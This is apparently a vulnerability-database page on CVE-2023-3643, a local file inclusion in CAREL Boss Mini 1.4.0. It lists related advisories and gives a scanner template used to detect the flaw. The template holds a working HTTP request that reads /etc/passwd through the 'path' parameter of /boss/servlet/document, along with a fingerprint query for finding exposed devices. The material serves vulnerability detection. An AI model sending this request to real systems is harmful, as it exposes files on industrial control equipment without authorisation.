| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Boss Mini 1.4.0 - local file inclusion Exploit | 4 Mar 202400:00 | – | zdt | |
| CVE-2023-3643 | 12 Jul 202322:25 | – | circl | |
| Carel Boss Mini 安全漏洞 | 12 Jul 202300:00 | – | cnnvd | |
| CVE-2023-3643 | 12 Jul 202317:31 | – | cve | |
| CVE-2023-3643 Boss Mini document file inclusion | 12 Jul 202317:31 | – | cvelist | |
| Boss Mini 1.4.0 - local file inclusion | 3 Mar 202400:00 | – | exploitdb | |
| Boss Mini v1.4.0 - Local File Inclusion (LFI) | 3 Mar 202600:00 | – | exploitdb | |
| EUVD-2023-44287 | 12 Jul 202317:31 | – | euvd | |
| CAREL Boss-Mini | 20 Jun 202406:00 | – | ics | |
| CVE-2023-3643 | 12 Jul 202318:15 | – | nvd |
id: CVE-2023-3643
info:
name: CAREL Boss Mini <= 1.4.0 - Local File Inclusion
author: Kazgangap
severity: critical
description: |
Boss Mini 1.4.0 Build 6221 contains a file inclusion caused by manipulation of the 'path' argument in boss/servlet/document, letting remote attackers include arbitrary files, exploit requires remote access.
impact: |
Remote attackers can include arbitrary files, potentially leading to remote code execution or full system compromise.
remediation: |
Update to the latest version of Boss Mini or apply security patches provided by the vendor.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-3643
- https://www.cisa.gov/news-events/ics-advisories/icsa-24-172-02
- https://vuldb.com/?id.233889
- https://www.exploit-db.com/exploits/52482
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-3643
epss-score: 0.75206
epss-percentile: 0.99452
cwe-id: CWE-22
metadata:
verified: true
max-request: 1
vendor: carel
product: boss-mini
fofa-query: icon_hash=="1092427843"
tags: cve,cve2023,lfi,carel,boss-mini,ics,path-traversal,file-inclusion
http:
- raw:
- |
POST /boss/servlet/document HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: https://{{RootURL}}/boss/app/report/popup.html?/etc/passwd
path=/etc/passwd
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- "status_code == 200"
condition: and
# digest: 4a0a004730450220482350ddeb80cd15f9c07d8c44e3cbc98197af7c2978eda05f68efedc3a0018e022100e85aa3d43bc1917ca36b7168b6ba10de9e0ef2305809cbea4986614cb51bd1dd:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation